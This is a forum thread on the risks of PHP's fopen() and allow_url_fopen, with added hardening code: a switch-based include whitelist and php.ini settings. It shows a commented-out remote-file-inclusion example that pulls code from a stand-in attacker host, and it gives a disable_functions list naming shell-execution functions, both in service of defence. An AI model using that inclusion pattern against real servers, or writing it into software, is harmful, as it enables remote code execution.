"Search google. Fopen in itself is not a security risk. Sloppy coding using fopen is."
I guess it's sort of the "guns don't kill people / people kill people" concept. The function itself is not flawed, per se. However, it's dangerous in the hands of unskilled users. (If you have customers on your web boxes, you'll know not everyone is skilled and/or security minded.)
I believe fopen() is disabled by default with safe_mode on. If not, I'd disable it.
Don't enable it unless you ABSOLUTELY need it (from experience).
If you need it on, then make your code as follows:
1) Don't include() $_POST, $_GET, $_REQUEST vars directly; hardcode a switch($var). That's the safest way.
2) Make that var a CONSTANT if you can, so if something that was in the query string is malicious and tries to change the var, it will fail.
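The two rules above, side by side with the pattern they replace, as an added example (not code posted in this thread). The page names `home`, `about` and `contact`, the `pages/` directory and the `PAGE_FILE` constant are assumptions made for illustration:

```php
<?php
declare(strict_types=1);

// VULNERABLE pattern (shown only as a comment, never executed here):
// with allow_url_fopen/allow_url_include on, ?page=http://attacker.example/shell
// pulls and runs remote code; with them off it still allows ../ traversal.
//
//     include($_GET['page'] . '.php');

// Hardened: the request value is only ever compared against a hardcoded list.
// Whatever the attacker sends, the only strings that reach include() are
// literals written in this file. (Page names are hypothetical.)
function resolve_page(string $requested): ?string
{
    switch ($requested) {
        case 'home':
            return __DIR__ . '/pages/home.php';
        case 'about':
            return __DIR__ . '/pages/about.php';
        case 'contact':
            return __DIR__ . '/pages/contact.php';
        default:
            // URLs, traversal sequences, null bytes: all land here and are rejected.
            return null;
    }
}

$page = resolve_page((string) ($_GET['page'] ?? 'home'));
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}

// Rule 2: freeze the result in a constant. Unlike a variable, a constant cannot
// be reassigned by any later code, so nothing from the query string can swap
// the path after it has been validated.
define('PAGE_FILE', $page);
include PAGE_FILE;
```

The switch is deliberately a list of literals rather than a check such as "does the file exist", because existence checks still let `../` and stream wrappers through; the value from the request is used as a lookup key only, never as a path fragment.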
From what I've been reading, this does not have to do with a programmer's script, but with what a hacker can do if this "allow_url_fopen" is enabled on a server...
Right, but the option enabled at the server-level dictates what can go into scripts.
To summarize, if you set "allow_url_fopen = Off" in php.ini you prevent people from FOPENing remote URLs. Opening remote URLs in PHP code is useful, but if user input is anywhere near this function, it must be sanitized sanitized sanitized. Many people who write scripts never bother, so you can disable it altogether globally.
Note this isn't a magic bullet. There are many other dangerous functions. Google for "php disable_functions" for more info.
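The server-side settings the thread refers to, as an added php.ini fragment rather than configuration quoted from any poster. The weak and hardened values are shown together for comparison; a real php.ini keeps only one of each. The `disable_functions` list is an illustrative starting point, not a complete catalogue; `allow_url_include` is the separate directive (PHP 5.2.0 and later, Off by default) that governs include()/require() of URLs independently of fopen():

```ini
; --- Weak: remote URLs accepted by fopen(), file_get_contents(), include() ---
allow_url_fopen = On
allow_url_include = On
disable_functions =

; --- Hardened: no remote streams, and the usual command-execution
;     functions removed globally for every script on the box ---
allow_url_fopen = Off
allow_url_include = Off
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
```

To confirm what a given host actually runs with, check `ini_get('allow_url_fopen')` and `ini_get('allow_url_include')` from a script (or the output of `php -i`), since a `php.ini` edit only takes effect after the web server or PHP-FPM is restarted.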